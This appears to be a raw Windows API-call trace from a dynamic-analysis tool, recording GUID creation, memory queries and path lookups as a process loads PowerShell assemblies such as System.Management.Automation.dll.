	[0164.531] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0xe9eaec0c, Data2=0xcd2c, Data3=0x4a2e, Data4=([0]=0xbb, [1]=0xfb, [2]=0xc9, [3]=0x2a, [4]=0x16, [5]=0x55, [6]=0xd2, [7]=0xc7))) returned 0x0
	[0164.532] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0xa3602fa9, Data2=0x4cb9, Data3=0x45b1, Data4=([0]=0x9f, [1]=0x16, [2]=0xf9, [3]=0xfe, [4]=0x92, [5]=0xd8, [6]=0xed, [7]=0xb5))) returned 0x0
	[0164.533] VirtualQuery (in: lpAddress=0xbbde0, lpBuffer=0xbcca0, dwLength=0x30 | out: lpBuffer=0xbcca0*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0164.534] VirtualQuery (in: lpAddress=0xbbde0, lpBuffer=0xbcca0, dwLength=0x30 | out: lpBuffer=0xbcca0*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0164.535] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x2de60514, Data2=0x7110, Data3=0x41ff, Data4=([0]=0xbb, [1]=0xb0, [2]=0xb1, [3]=0x51, [4]=0x1e, [5]=0x73, [6]=0x45, [7]=0x84))) returned 0x0
	[0164.537] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0xcbbea328, Data2=0x36c7, Data3=0x4a18, Data4=([0]=0x8e, [1]=0x9d, [2]=0x40, [3]=0xbd, [4]=0xc, [5]=0x72, [6]=0x9c, [7]=0xe5))) returned 0x0
	[0164.538] VirtualQuery (in: lpAddress=0xbc030, lpBuffer=0xbcef0, dwLength=0x30 | out: lpBuffer=0xbcef0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0164.541] VirtualQuery (in: lpAddress=0xbb6a0, lpBuffer=0xbc560, dwLength=0x30 | out: lpBuffer=0xbc560*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.682] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x426aae07, Data2=0x8a2e, Data3=0x409f, Data4=([0]=0xa4, [1]=0x1b, [2]=0x3b, [3]=0xaa, [4]=0xc2, [5]=0x8c, [6]=0x9c, [7]=0xd9))) returned 0x0
	[0165.683] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x18fe33ca, Data2=0x49b9, Data3=0x4a15, Data4=([0]=0x89, [1]=0x60, [2]=0xef, [3]=0x8e, [4]=0x4c, [5]=0xee, [6]=0xe0, [7]=0xd5))) returned 0x0
	[0165.684] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x6282187d, Data2=0x9d9f, Data3=0x434e, Data4=([0]=0xb1, [1]=0xf8, [2]=0x35, [3]=0x13, [4]=0xb2, [5]=0x8a, [6]=0xdd, [7]=0x8d))) returned 0x0
	[0165.684] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0xd956252e, Data2=0xed45, Data3=0x4707, Data4=([0]=0x8e, [1]=0x60, [2]=0xb5, [3]=0x92, [4]=0xe1, [5]=0x3e, [6]=0x14, [7]=0x26))) returned 0x0
	[0165.685] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0xa5c78e6c, Data2=0xc6ad, Data3=0x42cf, Data4=([0]=0x81, [1]=0x4e, [2]=0x4a, [3]=0xd1, [4]=0xfa, [5]=0xe0, [6]=0xf7, [7]=0x81))) returned 0x0
	[0165.685] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0xcc5e751d, Data2=0x95cc, Data3=0x4f97, Data4=([0]=0x91, [1]=0xc9, [2]=0xe2, [3]=0x8b, [4]=0xff, [5]=0x4c, [6]=0x99, [7]=0xa4))) returned 0x0
	[0165.685] VirtualQuery (in: lpAddress=0xbbd70, lpBuffer=0xbcc30, dwLength=0x30 | out: lpBuffer=0xbcc30*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0165.686] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x7ace03f6, Data2=0x7e8c, Data3=0x49b4, Data4=([0]=0x81, [1]=0xea, [2]=0xb, [3]=0x6a, [4]=0x8, [5]=0x43, [6]=0x82, [7]=0x6))) returned 0x0
	[0165.686] VirtualQuery (in: lpAddress=0xbbd70, lpBuffer=0xbcc30, dwLength=0x30 | out: lpBuffer=0xbcc30*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0165.687] VirtualQuery (in: lpAddress=0xbbd70, lpBuffer=0xbcc30, dwLength=0x30 | out: lpBuffer=0xbcc30*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0173.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.388] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0xdaac96a, Data2=0x1d2, Data3=0x4806, Data4=([0]=0x8c, [1]=0x1f, [2]=0x86, [3]=0xb3, [4]=0xa, [5]=0xe5, [6]=0xd4, [7]=0xd1))) returned 0x0
	[0173.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.391] VirtualQuery (in: lpAddress=0xbb3d0, lpBuffer=0xbc290, dwLength=0x30 | out: lpBuffer=0xbc290*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0173.392] VirtualQuery (in: lpAddress=0xbb460, lpBuffer=0xbc320, dwLength=0x30 | out: lpBuffer=0xbc320*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0173.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.393] VirtualQuery (in: lpAddress=0xbbbe0, lpBuffer=0xbcaa0, dwLength=0x30 | out: lpBuffer=0xbcaa0*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0173.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.395] VirtualQuery (in: lpAddress=0xbbbe0, lpBuffer=0xbcaa0, dwLength=0x30 | out: lpBuffer=0xbcaa0*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0173.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0173.396] VirtualQuery (in: lpAddress=0xbbbe0, lpBuffer=0xbcaa0, dwLength=0x30 | out: lpBuffer=0xbcaa0*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.674] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0xbb750557, Data2=0x9ada, Data3=0x4aed, Data4=([0]=0xaf, [1]=0x44, [2]=0x7a, [3]=0xeb, [4]=0xea, [5]=0xe7, [6]=0x63, [7]=0x18))) returned 0x0
	[0176.675] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x96e5f722, Data2=0xa7c4, Data3=0x4b0b, Data4=([0]=0x90, [1]=0x29, [2]=0xca, [3]=0xb5, [4]=0x77, [5]=0x11, [6]=0xc8, [7]=0x51))) returned 0x0
	[0176.676] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x7c3ce6cf, Data2=0x4d1a, Data3=0x4df5, Data4=([0]=0xb9, [1]=0xa4, [2]=0xa5, [3]=0x61, [4]=0x7e, [5]=0x93, [6]=0x2a, [7]=0x21))) returned 0x0
	[0176.676] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x95c54d70, Data2=0xff88, Data3=0x4c73, Data4=([0]=0xa3, [1]=0x31, [2]=0x5a, [3]=0x3f, [4]=0xb1, [5]=0x67, [6]=0xc5, [7]=0x58))) returned 0x0
	[0176.677] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x6babcfad, Data2=0xdfdb, Data3=0x4097, Data4=([0]=0xbb, [1]=0xc5, [2]=0x28, [3]=0x8b, [4]=0x7e, [5]=0x29, [6]=0x92, [7]=0x2d))) returned 0x0
	[0176.677] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0xe5e08bc9, Data2=0x278e, Data3=0x4432, Data4=([0]=0x8d, [1]=0x1a, [2]=0xc2, [3]=0xe9, [4]=0x2d, [5]=0x6e, [6]=0x62, [7]=0x86))) returned 0x0
	[0176.677] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0xdba899e9, Data2=0xe7fb, Data3=0x4318, Data4=([0]=0xa0, [1]=0x14, [2]=0x56, [3]=0xfa, [4]=0x41, [5]=0x7f, [6]=0x15, [7]=0xf3))) returned 0x0
	[0176.678] VirtualQuery (in: lpAddress=0xbbd70, lpBuffer=0xbcc30, dwLength=0x30 | out: lpBuffer=0xbcc30*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0176.679] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x11ba4571, Data2=0xc12e, Data3=0x4990, Data4=([0]=0xae, [1]=0xba, [2]=0xc3, [3]=0x7a, [4]=0x4d, [5]=0x8b, [6]=0x34, [7]=0xb0))) returned 0x0
	[0176.680] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0xe730babb, Data2=0x10cb, Data3=0x4ecb, Data4=([0]=0x98, [1]=0xd, [2]=0x70, [3]=0x7d, [4]=0x32, [5]=0x80, [6]=0x92, [7]=0x7e))) returned 0x0
	[0176.680] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x9401c905, Data2=0x8bfc, Data3=0x4fa9, Data4=([0]=0xbe, [1]=0xd1, [2]=0x3c, [3]=0x34, [4]=0x14, [5]=0xd9, [6]=0x9d, [7]=0x7f))) returned 0x0
	[0176.681] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x47ec57f1, Data2=0x3465, Data3=0x4f39, Data4=([0]=0xb8, [1]=0x24, [2]=0x72, [3]=0x73, [4]=0x2d, [5]=0x62, [6]=0x63, [7]=0xa5))) returned 0x0
	[0177.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xbd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0177.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xbd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0177.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xbd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0178.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xbd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0178.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
